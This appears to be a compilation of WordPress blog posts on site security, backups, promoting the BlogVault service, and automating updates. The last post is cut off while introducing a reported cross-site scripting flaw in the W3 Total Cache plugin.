Why-WordPress-Backup-and-Security-is-Important

Do you have a WordPress site? If yes, then it is important to remain up-to-date regarding the most excellent security measure with the main goal to shield your site and information from any dangers.

There are definitely many website owners who are nagging about the security of WordPress.

According to my opinion, an open source content is powerless against a wide range of threats. However, if we think practically, we also need to consider in a different way. Suppose it’s valid partially, yet none of us can blame WordPress.

Why can’t we blame the WordPress? Whose fault is it that your site got hacked? As a site proprietor, there are a few duties that you need to deal with. Henceforth the major question always depends on what you are going to do to save your site from being hacked?

Today organizations of all sizes are not safe due to the increase in threats. Over 90,978 attacks occur every minute on an approximate. Luckily, there are several methods used to protect the WordPress site. One of the most popular solutions among all is using WordPress Backup and Security plugins.

How To Manually Work On WordPress?

WordPress a web application in view of PHP and MySQL and thus you have to take backup of all the documents and its database as an alternative to your site. The simplest approach to duplicate your documents is by means of FTP. Ensure that you spare all the documents and organizers in the catalog WordPress that is introduced into your site.

The WordPress database can be moved down to some other database. Just take after the directions in our instructional exercise on the most proficient method to backup MySQL databases. In fact, if you have numerous MySQL databases and you ponder which one your site is utilizing, open the wp-config.php record in the WordPress root organizer and you’ll see the database name spared by the DB_NAME alternative.

Also Read: Beginner’s Guide: How to Manually Backup WordPress Database with phpMyAdmin

WordPress… Is it Secure?

The question about WordPress security will definitely arise in everyone’s mind, as the hackers are around frequently trying to infiltrate WordPress sites. Even while there are several limitations, WordPress is secure.

The team working for the security of WordPress are diligent enough to stop all kinds of vulnerabilities that surface inside the WordPress center. Security patches are incorporated into center updates that are released reliably on a regular basis. For instance, there are times where they have fixed in less than 40 minutes of a vulnerability disclosure.

But the condition is that you have to stay up-to-date with the WordPress in order to apply all the security fixes that are taken off. Luckily, through a couple of clicks, updates can be promoted consequently or physically. You can likewise put off the automated updates. But at the same time, you also need to run the tests that are comparable in advance.

But the most practical and the basic actions that you can utilize to improve the security of your site is keeping it up-to-date. Each and every other method you apply is also important, yet it won’t benefit you in any way if the WordPress itself is vulnerable.

Here are a few tactics that can help you to secure your WordPress Website –

  1. A Stable Login Page That Avoids Violent Attacks

Despite the fact that every individual is aware of the standard WordPress login page URL (domain-name/wp-login.php or domain-name/wp-admin/), hackers make an attempt to make a dangerous threat as the backend of the website is accessed from the main URL.

So I would recommend you to customize your login page URL along with the page’s interaction.  

You might think why one should customize their WordPress Plugin?

Brute force attack is the most common type of hacking on WordPress. In this type of attack, hackers try to get inside of your website/blog by attempting various usernames and passwords. There are many ways that assist you to prevent brute force attacks. One of the major steps you can take to reduce the  chances of getting attacked is by changing the WordPress admin login page URL

Tip: Steps You should follow to Customize your Login page URL.

The simplest way to change your Login URL is by installing, activating, and configuring a security plugin to your WordPress site.

With this, you’ll be able to change

  1. /wp-admin/ to /admin/
  2. /wp-login.php to /login/
  3. /wp-login.php?action=register to /register/
  4. Change URL according to the page you select in the plugin settings

Before we move ahead, I would recommend you to understand the WordPress Security options before you make any changes in the settings section. Have a discussion with your host before you take on any unusual step that you aren’t sure off. Follow all the instructions for Better WordPress Security and updating of your Dashboard options.

1 Step: Take a complete backup of your site. Once you’ve completed taking the backup, verify it before you move to the next step.

2 Step: Install and activate a WordPress Security Plugin is best for your site. Ensure that the features are good enough to manage your Login URL.

3 Step: Install and Setup a WP security plugin. Once the setup is ready,        

  1. Open wp-admin or wp-login options page
  2. Create the backup selection
  3. Allow the security plugin to change WP core files
  4. Click “Secure My Site From Basic Attacks” button.    
  5. Click the “Hide” tab.
  6. Check the “Enable Hide Backend” box.    
  7. Enter your desired register, login, and admin pages or leave them at the security plugin’s defaults of “register”, “login”, and “admin”.        
  8. Click “Save Changes”.

And that’s it. And not to forget, follow the above steps so that you can easily change your Login URL.

  1. It Is Also Important That You Protect Your Admin Dashboard

Admin dashboard which is the most protected section of all is also one of the most engaging parts for a hacker. Thus, for a hacker, assaulting the most grounded part is the biggest challenge. If succeeded, then it’s a moral triumph and they utilize this source to do lots of damage in your website.  

  1. Protect Your Database

Dealing with your database is the most crucial part as the majority of your site’s information and data is stored in there. So do you think that your Database is protected?

Well…, moving ahead!!!

While I spoke about the WordPress security and how you can keep your WordPress site, a secure one, let’s also take a look at the WordPress backup.

A backup for your site is always essential in case something goes wrong. Let’s cover up at the useful ways to backup your WordPress website.

Why is Backup Necessary for your WordPress Site?

Internet threats are increasing. And yet, you might have heard about why you need to take backups of your site in your external devices. Threats on the website have been really hard and thus Backing up your website helps you to safeguard against those threats.

A regular backup of your website is vital and thus all website owners are aware of it. It is important to be serious about the threats that are occurring in the present world of internet. As an owner of the website(s) you cannot be ignorant on hackers or mistakes that are occurred internally.

Taking backup is helpful in certain ways. Here is why is taking a backup important,

  1. Threat from the Hackers
  2. A Catastrophe in your computer
  3. When your updates go wrong
  4. Viruses, trojan and other malware can hit your PC
  5. An error occurred by an employee due to negligence     

How To Backup Your WordPress Site With BlogVault?

You might have come across your clients or friends complaining about the nasty run they had with the hackers. Hackers can slash of your website with DDOS attacks and as a security precaution, the web host can shut your site down for a couple of days. It can definitely be a frustrating one. But if you are lucky enough to have a backup, then it’s easy to tuck away with working safely and seal off the security hole, hit the restore button and just like that, come back in business.

What would you do if you lost your website(s) to hackers, how would you return?

I’ve experienced getting hacked sometime recently. Since I didn’t have a backup solution that I could depend on, I had to reconstruct my site from the scratch with no outside help.

Regardless of whether you lose your webpage to the terrible folks or break something because of a mistake occurred manually, you can just depend on a solid backup solution for recovering and reestablish your site to its previous magnificence. This is the place BlogVault, the subject of this long audit comes in.

The BlogVault benefit assumes control from that point, and you can backpedal to the same old thing. You don’t need to affirm messages and so forth, simply begin moving down your website from the Blogvault dashboard.

Backups-on-the-new-BlogVault-dashboard
Backups on the new BlogVault dashboard

BlogVault is basically a Backup service solution. It is a very simple solution that can be made use of.  A robust backup solution, Blogvault will help organisations of all sizes.

After you’ve joined BlogVault, you’re instantly provided with a dashboard that will help you manage your site. With the help of BlogVault, you can schedule your backups automatically for your whole site. This helps you to save the storage space in your server as the backup will be saved in the off-site server. Even if you’re not logged into BlogVault, the backups will run unnoticed.

BlogVault a unique service that can be utilized in a progressive way to deal with your website by taking backup frequently. BlogVault looks at your site and makes a comparison with all the old Backups and saves your time by restoring with the latest version flawlessly.

Wrapping up

We’re all human by the day’s end, and the activity of frameworks by admin, particularly when overburdened with spam, can be really challenging. This is the reason why backups and security exists. Every time your site goes down or information is lost you can simply rely on BlogVault.

An ideal WordPress backup solution offers a number of features. However, there are two questions you can ask that will help you choose the best WordPress backup plugin for you. They are , what features does the plugin have, and how do they work?

What Makes an Ideal WordPress Backup Plugin?

There is a long list of features which make an ideal WordPress backup plugin.

  • Multiple versions
  • Multiple copies of each version
  • Encrypted backups
  • Independent storage and access
  • Test Restore
  • One-click restore
  • One-click migration
  • Secure site settings

A combination of all of the above sounds like a good deal; doesn’t it?

Most of these features are covered between the popular backup options available on the market. Also, most premium options have most of the above mentioned features. However, it is not useful to say this. It is like saying that every car has an engine, seats, wheels and steering. Just like cars, when it comes to backup solutions, it is all about how they perform; and you really need to do your homework first.

 

Choosing the Best WordPress Backup Plugin

 

There are two points of entry to the debate on the best WordPress backup plugin. One is the differences in features between all the different plugins; despite the uniform titles. The other point of debate is the user experience. What does a good WordPress backup solution do, and how does it do it? Both these questions should be equally relevant.

In this article we explore how following best practices as well as being efficient can answer both: the ‘what’ and the ‘how’ questions.

 

1. WordPress Incremental Backup Plugin

Increased load times or frequent timeouts is highly undesirable in today’s competitive environment. This is is particularly a problem for WordPress sites on shared hosting. Incremental backups is perfect for such circumstances.

For example, let us say that you have photography focused website with high resolution images uploaded everyday. If your entire site had to be backed up daily, then chances are that the backups ruin the user experience of you site’s visitors or your backups may cut off for taking up too much server resources.

On the other hand, consider that automatic incremental backups of your WordPress site are done daily. After the first initial full backup, each day only the latest updates are backed up. This ensures that you don’t lose any data while the backup solution does not unnecessarily load your server resources. The plugin can scan the site for changes, recognize that the high resolution images are backed up, and only add the changes to the latest version of the backups. This means that, media – images and videos which are generally the the most heavy files on a site do not become an extra burden with incremental backups.

 

2. Control over entire WordPress database & all WordPress files

A WordPress sites contain files and tables. You must be able to know that all the tables, and files on your site have been backed up. If not you must be able to add them. This is possible when you have access to a list which gives you this kind of information; a good WordPress backup solution must offer such access. From such a list, you may also be able to download specific files from WordPress backup. The same applies to specific tables in your WordPress database as well. This depends on your requirements but you need to have the option.

Such a feature along with versioned backups allows for restoration of specific files instead of the entire site. This is important if you know the exact pain point on your site. It can be fixed with ease and minimize down-times. This type of granular control is essential when choosing a WordPress backup solution.

The dread of having to sift through thousands of files; when you’re running against the clock to get your site back up and get around to doing business, is unacceptable.

 

3. One-click Restore/Migrate

When you pay for a solution to do the work for you, then you shouldn’t have to manually restore or migrate your site. Otherwise, there is little point to lightening your wallet, is there? A plugin must allow for one-click WordPress restore and one-click migrate options. Managing your site’s functionality in the most critical hours must not be your headache. Usually in such instances inputting your SFTP credentials, destination URL and email id should be enough to easily migrate your WordPress site.

 

4. Test restore option

Apart from restores and migrations, it is equally important for you to be able to ensure that your backups or migrations work as desired. Allowing for a test environment to verify the functionality of different backup versions of your WordPress is just a good practice but unfortunately, most plugins don’t offer this. It boosts your confidence in your backups and ensures that the reputation of your blog/business is intact.

 

5. Great customer support

A service or product which does not allow you to track all the activities from the dashboard, notify you by email will only worry you about routine processes. If the time comes when you have to get your hands dirty, then you should not do the work yourself when you are paying for a service. This is reason you need great customer support.

 

6. Completely independent dashboard

With a completely independent dashboard you have access to and control over your backups always. This means that, unlike other plugins which store backups in your site’s files, you don’t have to restore your site to get your hands on your safety net a.k.a. your backups. Besides, the whole point of backups is to restore your site. If that is not supported well enough then backups are not good enough by themselves. You need to know that you have access to secure backups. Multiple copies of encrypted off-site backups is a must.

All the above mentioned best practices will ensure that you’ll find the right value for your money when you need the best WordPress backup plugin.

Reaching for your spare tire, only to find out that it is not working; or worse, that it is missing altogether is unacceptable. WordPress backups are a little more complicated than changing car tires and just like your car tires, there is a lot riding on them too. Your lifetime’s work or the hard-earned reputation of your business is at stake.

 

Building a WordPress website, and maintaining it along with its backups, is no joke.

 

The number of WordPress (WP) backup plugins that are available in the market today must make it seem that problems regarding backups are a thing of the past. But, as we said, backups are complicated. A lot can go wrong when you are using stand-alone plugins (meaning ones that operate on the Software-as-a-Product model).

The  WordPress Backup Plugins vs. managed WordPress Backup Service debate can be framed as Standalone Plugin vs. Software as a Service model (Saas).

Many articles refer to how the SaaS model economically benefits the end user, however, there are many use-case benefits too. In this article we’ll look at some common issues with stand-alone WP backup plugins, and how a managed WP backup service is a better option.

 

Why Your WordPress Backups Will Fail With the SaaP Model

Installing the plugin is the beginning. Once installed, a stand-alone WordPress backup plugin must be configured. Very often people underestimate how backup plugins may become relatively labor-intensive and accrue more expenditure over time. These may come in different forms including add-ons and premium account features that may be essential to your business.

Some problems you may run into when you’re using a stand-alone WP backup plugin include:

Configuration issues

  • Getting Started: Once a plugin is installed, a remote backup destination must be selected. You can select services like your Google Drive account, Dropbox, or Amazon S3 servers. After this, you must input the login credentials of those accounts.
  • Add-ons: To get the desired setup for your backups, your plugin may require that you buy an add-on. Add-ons can soon build up to become a considerable list. While calculating the cost of a plugin, add-ons must be accounted for, in order to get a fair estimate.
    • Saving backups in more than one destination may need an add-on, and extra charges may be applied.
    • Other features like encrypted backups of your website’s database may not be available unless you pay more for add-ons or upgrade to premium accounts. This means your backups are not really secure even after investing all this time, energy and money.
  • Tracking: Ensuring that backups are happening is important so that you know exactly what resources you have to draw upon in your hour of need.
    • If you’re storing backups on your Amazon S3 account, it needs to be configured to send you notifications when backups occur or when changes are made to files (these are called ‘event’ notifications).
    • Otherwise, you may have to pay more to your plugin company for email notifications. An alternative option is to login to WP website dashboard each time.
  • Key to Your Backups: While backing up your website to your Dropbox account or your own Amazon S3 account, most plugins store a copy of the API key/S3 access key on your WordPress site. The key is how the WordPress backup plugin on your site accesses the backup destination. This may not be in keeping with best practices of performing WordPress backups. In such cases, a hacker who has access to your site, may also have access to your backups via the security key.
  • Know-how: Managing your own Amazon S3 account requires you to know how the account stores your information (buckets, objects) and other points like access control, and versioning so that you can make sure that your data is secure.
  • When You Need to Restore: Apart from all these points, when you need to use your backups to restore your site, you’ll need to unzip the folders and manually restore the files correctly. This may not be the best option for everyone.
  • Storage Options: The plugin company may provide storage space. This option, like in the case of Amazon S3 servers, is an extra charge over the plugin that you must bear. It is a recurring cost to you, which must be paid periodically (monthly/quarterly).

Notification Issues
Like we mentioned backups are complicated. If for any reason backups stop happening or problem occurs, then it is important that you’re notified immediately. For example, an error in the plugin has stopped it from backing up your site without notifying you. Otherwise if you have exceeded the storage limit of your backup destination then backups may stop occurring. Regardless of the scenario immediate notifications are very important.

The burden of solving all of these issues; on top of running your business/blog, fall on you, when you purchase a software product.

Regardless of the cause, the net result is that you’re stranded on the freeway, with no (usable) spare and your tire is a software product. This means, it’s likely that you may not have anyone to call for ‘tech support’. This is not a scenario you want to be caught in when you look for your backups.

Now consider that an expert is looking after your tires, maintaining the air pressure, checking the rims and upgrading the tire as the weather and the terrain changes; along with making sure that it is in the boot of your car. This would simplify and enhance your business, wouldn’t it?

 

How to Ensure That Your WordPress Backup Always Works

And, how can the SaaS model solve the issues mentioned above, for you?

 

When you get a subscription to a software, you are getting a service. A team of experts are managing and maintaining the software and the hardware. They are responsible for granting you access.

Let us clarify, SaaS doesn’t mean that there is no need to download and install a plugin. As in the case of BlogVault, the plugin can be very light as all the complexity sits on the provider’s server, where the heavy-lifting is done. For the user this means:

  • Zero-configuration: Install the plugin and it begins its work. You are ready to use BlogVault from the moment your subscription is active. The backup process starts automatically when you first login.

(This is the main reason this list is relatively short. Remember the long list of configuration issues with standalone backup plugins? Web-hosted software means, all of that responsibility for the managing the plugin and off-site storage is off your hands. Everything is covered for in the subscription.)

  • Lesser load on the site, better performance–  Site performance and page load times are crucial to delivering good user experience cannot be overstated, as even marginal differences show measurable changes in results.
  • Rapid Updates: Updates happen mostly on the service provider’s server, reducing the frequency of updates required on your site.
  • Backups are safe even when your site is compromised: Backups; because they are completely independent of your website, are accessible even when your website is down. You don’t need to get your site running to access your backups.
  • Incremental Backups: This means large sites are also completely backed up without hassle. Backing up only the changes means faster and more efficient backups.
  • Expert Tech Support: A team of experts maintain the software and the hardware. You can not only count on tech support, but know that the team can be highly responsive as they are maintaining the backups themselves. This can help at times of Test Restore, Auto Restore and Migrations. For more on these features you can check out BlogVault.

 
Now you know the differences between SaaP and SaaS models in the context of WordPress Backup. Make an informed choice that gives you the most scope for developing your business, without adding to your task list or financial burden.

 

WordPress site owners are constantly asked to update their sites. But keeping track of updates is incredibly difficult, because of the frequency and number of updates to be made. This is why automating updates might a useful practice.

 

Making sure your WordPress site is up to date could be an overwhelming process, since there are so many releases.

 

If there’s one piece of advice in the world of WordPress for site owners, it’s this: update, update, update. Updating WordPress is easy in theory, especially since all site-owners receive notifications about core and plugin updates. When it has to be put into practice, though, updating WordPress is its own beast. Not only might updates break WordPress sites; they might also cause incompatibilities, and be impossible to undo as well. This is why it’s important to always have a reliable backup solution for WordPress sites.

Updating WordPress is an important task though, because of new features that might impact user experience, but also security updates that help against major vulnerabilities. However, with WordPress receiving updates very frequently on the Core as well as the add-on front, it is difficult to keep up with all the changes, and apply them. This is why automating updates on WordPress sites might be a workable solution for you as a WordPress site owner.

Types of WordPress Updates

While updates for WordPress add-ons have both developmental as well as security updates, updates for WordPress core perform different functions. Based on these functions, WordPress Core updates can be categorized into:

  1. Release updates, which contain both Major and Minor releases.
    1. Major updates contain developmental changes including the addition of new features, or changes to core technologies on WordPress. Every major release is named after a major jazz musician.
    2. Minor updates contain security patches and fixes. As a result, they are highly recommended, and are automated by default on every installation of WordPress. Every WordPress site is recommended to run these updates since they contain important security updates that keep WordPress sites safe.
  2. Developmental updates, which are only for the changes that might be unstable– these updates are what future developments are built on. Also known as ‘bleeding edge’ updates, they are only meant for sites running the developmental version of WordPress.
  3. Translation updates (which are language packs), and come in handy if your WordPress site has multilingual support.

Depending on your comfort-level with code, and the time you’re willing to spend maintaining your site, you could automate your WordPress site’s updates manually, with the help of a plugin, or via managed WordPress services. Every method has its pros and cons, so it’s best to choose one with careful thought.

Automating WordPress Updates the Manual Way

This method will require you to make changes to your WordPress installation’s core files.

How to automate updates to WordPress Core the Manual Way

Updating WordPress Core includes making changes to the wp-config.php file.

WordPress contains a parameter called define( ‘WP_AUTO_UPDATE_CORE’) in the wp-config file. The value you assign this function determines WordPress release update is automated.

To Automate All WordPress Core Updates

Assign the value ‘true’ to the above function, as demonstrated:

define( ‘WP_AUTO_UPDATE_CORE’, true );

This will enable the automation of all release updates, developmental updates, and translation updates on your WordPress site.

To Only Automate WordPress Core Minor Release Updates

As mentioned, WordPress automatically makes Minor release and translation updates to your site. However, if you disabled all automatic updates by assigning the above function the value ‘false, you would have disabled Minor updates too. Just assign the value minor to the same function above, instead of true. This will disable all updates other than Minor updates, which keep your WordPress site secure.

Here’s how you do it:

define( ‘WP_AUTO_UPDATE_CORE’, minor );

 

How to Automate Updates to WordPress Add-ons the Manual Way

Automatically updating add-ons isn’t recommended by WordPress, since the developers’ updates might work for that plugin/theme, but might be incompatible with other add-ons or elements on your WordPress site. However, if your WordPress site is simple and has very few plugins/themes that are compatible with each other, it might not be as big a problem.

In order to manually configure your installation of WordPress to update plugins & themes, you have to make modifications to a filter called auto_update_$type, found in the wp-admin folder. The value assigned to $type determines which WordPress add-on is updated automatically.

To automatically update all plugins on your WordPress site, the filter must read:

add_filter( ‘auto_update_plugin’, ‘__return_true’ );

To automatically update all themes on your WordPress site, the filter must read:

add_filter( ‘auto_update_theme’, ‘__return_true’ );

Pros of Manual Automation of Updates

  • The code isn’t complex, so it’s beginner friendly.
  • Manual automation is free.
  • WordPress site owners won’t have to install an extra plugin just to keep their site up to date.

Cons of Manual Automation of Updates

  • The changes have to be made to the WordPress wp-config.php files and the wp-admin folder. This might make some WordPress users uncomfortable, especially since changes to the WordPress core files are not recommended.
  • Making the changes to code might require some time, especially for WordPress novices.
  • If your site crashes with any update, you will have to check your site’s status after disabling each update manually.

 

Automating Your WordPress Site with Plugins

This method comes in handy for WordPress site-owners who do not want to tinker with code themselves, and don’t mind installing an extra plugin on their site. A couple of examples of plugins that help automate updates, are Advanced Automatic Updates, and WP Updates Settings.

How to Use the Advanced Automatic Updates Plugin

Step 1: Install and activate the plugin.

Step 2: Locate the plugin under your WordPress site’s Settings tab, and click on it.

Using the Advanced Automatic Updates plugin

 

Step 3: Check the kind of updates you would like to automate on your WordPress site.

 

Updating Themes with the Advanced Automatic Updates plugin

 

If you would like notifications about these updates to be sent to an email address other than the one of the site owner, you can enter it here:

 

Notifications with Advanced Automatic Updates

 

As you can see, you can also disable email notifications about the same, and request for debug information (in case you’re running development updates).

How to Use the WP Updates Plugin

Step 1: Install and activate the plugin.

Step 2: Just like for the Automatic Updates plugin, locate the Updates tab under your Settings tab, and click on it.

 

The WP Updates plugin shows up under Settings

 

Step 2: Choose the kind of WordPress Core release updates you would like to automate on your WordPress site.

 

Core Updates with the WP Updates plugin

 

Step 3: Choose whether you would like to automatically update add-ons on your WordPress site.

 

Plugin and theme updates with the WP Updates plugin

 

Step 4: If you’d like translation and developmental updates, click on the appropriate check-boxes.

 

Click on these checkboxes if you want other updates also to be automated.

 

Pros of Automating Your WordPress Updates With a Plugin

  • These plugins do the work for you: you don’t have to manually tinker with any code; they’ll do it for you.
  • Most plugins that automate WordPress sites allow you to enable or disable different updates with a single click.

Cons of Automating Your WordPress Updates With a Plugin

  • This will require you to install an extra plugin just for updating your WordPress site.
  • Some plugins only update WordPress core, while others will allow you to update add-ons as well.
  • You, as a WordPress site owner, will still need to weed out problems if your site crashes with updates.

Using Managed Services to Automate Your WordPress Site

There are two types of managed services you could use to automate updates on your WordPress site: managed WordPress hosting, and WordPress support and maintenance services.

Managed WordPress Hosting

These services help manage your WordPress site’s hosting issues, as well as a few issues related to your WordPress site as well. A couple of examples of managed WordPress hosting services/ managed WordPress hosting providers are Flywheel, and WP Engine. These services automate the update of your entire WordPress site, but after the following steps meant to benefit you no matter the state of compatibility of your WordPress site:

  1. The hosting provider checks their systems for compatibility with WP updates (whether this includes both core and add-on updates depends on the web host).
  2. They then mail you beforehand with the dates for your WordPress site’s update.
  3. Every managed hosting service performs a backup of your WordPress site before the update. Only after this do they perform the update.
  4. Once they perform the update, they check for issues.
  5. If your WordPress site is not compatible with the update, the managed hosting provider restores your site with the backup that they made.
  6. The service then mails you about the status of the update (successful/unsuccessful, and reasons if unsuccessful).
  7. If you’ve tested your site and found it incompatible, you can ask certain web hosting services to postpone updates till you fix the issue at hand.

Notes:

Plugin and theme updates are not done automatically by managed WordPress hosting services, simply because different plugins have settings that might conflict with each other and break your site.

If you’d still like to automate the updates of add-ons, you can get in touch with your WordPress host about the same.

Since each managed hosting service has different terms and conditions, and pricing plans, it is recommended that you read their documentation carefully, and then get in touch via email or from their in-website chat support.

Pros of Using a Managed Web Hosting Service With Automatic WordPress Updates

  • You, as a WordPress site owner, don’t have to fiddle with the WordPress core files.
  • Your WordPress hosting service tests and runs WordPress updates for you.

Cons of Using a Managed Web Hosting Service With Automatic WordPress Updates

  • Managed WordPress hosting comes at a price.
  • These services don’t take care of all the issues that might come up during updating your WordPress site. If your site has certain customizations that makes it incompatible with WordPress updates, these services might mail you asking for you to seek a professional developer’s assistance. This means even if you’re paying a premium price for managed hosting, you might also have to hire a WordPress developer separately.

WordPress Support and Maintenance Services

WordPress support and maintenance services (such as WP Curve, WP Maintainer, and Valet), are perfect for super-busy site owners who can afford to have a full-time service just for maintaining their WordPress sites. In terms of updates and maintenance, these services usually perform the following functions:

  1. Core and add-on updates.
  2. Support/repairs in case of incompatibility.
  3. Audit of the security and maintenance of your site so the chances of it breaking upon update are reduced.
  4. Regular backups to rely on in case of incompatibility with any update.

Similar to managed WordPress hosting services, it is recommended that you go through the list of their offerings, (and their pricing plans) carefully. All you have to do after that, is contact them over email, or from their respective websites.

Pros of Depending on WordPress Support and Maintenance Services

  • Since you are paying these services specifically to maintain your WordPress site, you can expect them to solve any problems you might have while updating your WordPress site.
  • You need not hire a developer to this end.

Cons of Depending on WordPress Support and Maintenance Services

  • These services come at a premium price, and usually require you to pay more in order to fix issues that might come up during updates. Each service has its own pricing plan.
  • A number of maintenance and support services do not provide free support, so if you run into issues with your site, it might be expensive to get them sorted out.

Automating your WordPress site might seem like an easy fix that will help your WordPress site stay up to date with security patches and new features, but it also comes with many caveats. Not only might updates your site break, but they might also be difficult to undo. This is why it is imperative for every WordPress site owner to maintain a recent, secure backup of their WordPress sites that can be relied on.

WordPress is the most popular CMS in the world. With WordPress powering 26% of the world’s websites it’s also one of the most preferred ways to publish content. What makes it so popular?

While there may not be a perfect CMS  (Content Management System), WordPress comes pretty close currently to being the best one. At least it is the most popular one by far. Search trends on Google show that there is considerable daylight between WordPress & other CMSes out there. This is, at least, to say that WordPress generates more interest than other platforms.

 

WordPress is the most popular CMS in the world.
WordPress is the most popular CMS in the world.

The popularity of WordPress represented by search trends is reflected in the usage rates of the CMS, with WordPress being used nearly ten times as much as its closest competitor, Joomla. While WordPress tops at 26.7% of websites using the platform, Joomla is used by about 2.8% of websites. This difference in usage rates only becomes more stark when you take a look at the market share of the CMS. WordPress has nearly 60% of the market share.

While the WordPress community across the world was growing, and more and more people were building WordPress sites for varied purposes, only the recent release of statistics has managed to shine a light on how big the CMS has actually become. About 26% of websites in the world are said to be powered by WordPress.

This number is said to grow to 30% in a few years as WordPress is not just the most popular content publishing option on the web, it is also the fastest growing  CMS. It is simply the most popular option for building websites. With this, the mission of “democratizing publishing” as Matt Mullenweg phrased it, seems to have been realized. However, this realization only seems to be the beginning of something bigger.

Here are some reasons as to not only why WordPress is big now but also why it is expected to continue to grow.

WordPress is Open-source

WordPress is an open-source CMS and will remain so in the future as well. With WordPress being open-source, a private company cannot decide to delete your content on their own, regardless of reason. This means that you’re unlikely to lose your content when you publish it using WordPress, such as in the case of Dennis Cooper’s blog on Blogger.

This means that WordPress is not only the most viable option economically, it gives you (the user) complete ownership over your content and and puts the power of publishing squarely in your hands.

WordPress In Your Language – Inclusive

WordPress communities have actively participated in translating the CMS into various languages. Currently according to WordPress.org, WordPress has been completely translated into more than 60 languages. Despite the fact that over 70% of WordPress sites are in English, translation makes the WordPress mission of democratising publishing a real possibility as websites and blogs can be produced in many, many languages and the platform instantly becomes relevant to a truly global audience.

Customizable

Although WordPress was largely seen as a blogging platform for long, it has been used to create  all types of websites. For this to happen not only is it important to have power over content but also the form in which it is published. WordPress was built to be fully customizable, and being an Open Source project, it welcomed contributions– core, plugins and themes, that made it flexible to suit different needs. This is one of the key reasons why the platform has become popular. Therefore, it’s perfect for beginners who want to start a blog on their own.

The showcase section of WordPress.org is proof of how effective WordPress has been for various purposes along with being a good blogging platform. You can refer to this resource to start your own blog.

WordPress Plugins & Themes – There is a plugin for that!

Themes help enhance the design and functionality of WordPress sites (header:image+text, body:video, sidebar:archive, footer:about company). They provide different templates. Plugins help customize these templates to add more functionality (to make header a carousel, to help site load faster), widgets usually help only appearance (eg: to add footer, sidebar to site).

Plugins and themes are what make it possible to employ WordPress is for building website for various purposes. This is also why there are so many contributors to plugins and themes. While many contributors are professionals, or companies, there is also a large community of amateurs and hobbyists working to make WordPress conducive for every need.

WordPress Plugins & Themes

Plugins

  • Plugin Repository -47, 211 Plugins
  • Downloads – 1,432,006, 605

Themes

  • Spoilt for choice
    • Thousands of free themes on WordPress.org
    • 85 commercially supported GPL themes
  • Themes for every purpose
  • Themes changed – In August 2016 – Nearly 2 million times

The interest in WordPress and growing repository of plugins and themes has also encouraged many third-party companies and developers to produce premium themes, plugins and services professionally.

Social Media

The power wielded by social media platforms is huge. One only needs to take a look at the number of users on social media platforms and their importance becomes clear; particularly for large businesses looking to find a portal to engage their target audience. There are more than a billion users on Facebook alone. Combine this with the growing importance of Twitter as a promotional and engaging platform for large business, and you realise why the ability to embed these posts in your WordPress is such a big deal. As this article on Business 2 Community mentions, “Twitter is the place to engage with companies: While just 20 of the of Fortune 500 companies actually engage with their customers on Facebook, 83% have a presence on Twitter— as do 76% of the NASDAQ 100, 100% of Dow Jones companies, and 92% of the S&P 500.”

Being able to provide an experience for users to engage with authoritative long form content & instantly share it with their connections in bite size form to start a conversation all on a single platform can be a powerful tool for businesses.

While WP gives users control over content it also understands that the real power of content is amplified through connections, which is what social media platforms are all about.

Embedded in WordPress

  • Twitter
  • Youtube
  • Flickr
  • Vimeo
  • Photobucket
  • PollDaddy
  • SoundCloud
  • Gigya
  • Google Maps
  • Slideshare
  • Dailymotion

WordPress Is A Rising Star

As more people use a platform, chances are that its following will increase because their interest has been roused. If so many people are choosing WordPress then there must be use value from the CMS. The continued growth of the CMS however can be attributed to the initial inklings that pushed them to use WordPress proving true. The scary or exciting part is that all the points that make WordPress useful are only growing bigger and stronger market-wise. We have seen this in the growth of the WordPress market.

People who contribute to the CMS:

  • Freelancers
  • Professional
  • Amateurs & Hobbyists

All contribute to the WordPress community and make it richer. There are also many areas for contributions with:

  • Theme designs
  • Website design
  • Building plugins
  • Content management

“WordPress Hacked!”: Strengths As Weakness

All this interest will definitely attract some unwanted attention too. It is already a concern for many that the top Google search suggestions for– “Is WordPress…” are “Is WordPress free”, or “Is WordPress secure”. The popularity of WordPress makes it a target for hackers or at least is perceived to do so. When a platform runs more than a quarter of all websites, the payoffs from being able to hack it will also be big.

All of these points make WP websites an attractive option for hackers. It is inevitable isn’t it  when a platform offers so many opportunities and is so popular that it will attract the those who are nefarious.

However, this perception of the most popular CMS, also being the most insecure one is simply not true. WordPress Core has been very secure, and more and more spotlight is being shone on hardening and securing WordPress sites than ever before. The growing market share and popularity has brought about the challenge of scale. It has converted WordPress’ most cherished tools– plugins and themes into double edged swords; if only in part. This is because most of the vulnerabilities exploited in the last few years have come from issues dealing with plugins and themes or WordPress site maintenance issues. Scale and an unregulated, fast-growing market have contributed to the many strengths and weaknesses of WordPress.

This is not mentioned as a warning sign but for the sake of spreading information. Awareness of pain points can lead to resolving or managing them more efficiently. WordPress is a community driven project & is based on informed users taking action.

You too can take some steps to put in place best practices for your website and not make it easy for hackers. Chances are that all it takes to protect you site is to make it a little bit harder for hackers, but it is interesting to see how many people miss out on the easy steps.

With all these points considered there is no doubt that WordPress is here to stay; and if anything, it will only grow bigger in the coming years. Being part of its community and this open source project may seem like a double edged sword for some, but if you stay informed and put in basic best practices in place then you will not only be safe with your WordPress site, but happy as well.

 

WordPress website owners are always cautioned to keep their installations of WordPress, plugins and themes up to date. But when a plugin hasn’t been maintained or updated from the developer’s end, potential exploits threaten everyone who has it installed.

Being someone who grew up in the 90’s, I still love video and audio cassettes. But as the world progressed to new technologies, the companies making the cassettes kept updating their technologies and methods too, and for good reason. No matter how I loved the uniqueness of magnetic tape, even I understood that it had its faults. It was time to move on.

 

The charm of old cassettes lingers

 

Most of the time, WordPress works in the same way too. The minute a problem is identified, developers work to release a fix for it, whether it’s an add-on or something on WordPress core.

This is why almost every piece of advice on the internet about ‘security practices for WordPress’ always first mentions that WordPress site users have to update every element on their site.

But what does one do when the technology itself isn’t updated, and after a vulnerability has been reported? The possibilities this opens up to hackers, are endless, which makes this a particularly alarming situation.

What makes it worse, is the fact that not many novice WordPress site owners know what to do when a plugin/theme/widget hasn’t been updated from the developer’s side. This became the most relevant, when El Rincón de Zerial’s security blog reported a cross-site scripting vulnerability in W3 Total Cache, at the end of September.

About W3 Total Cache

W3 Total Cache is a WordPress caching plugin that helps sites load faster. A website’s load time, as any website owner knows, affects its reputation, views, and business. The faster it loads, the better it is perceived by its visitors. This is why caching plugins are so widely used in the WordPress community.

W3 Total Cache in particular, had over 1 million active installs when the vulnerability was declared.

 

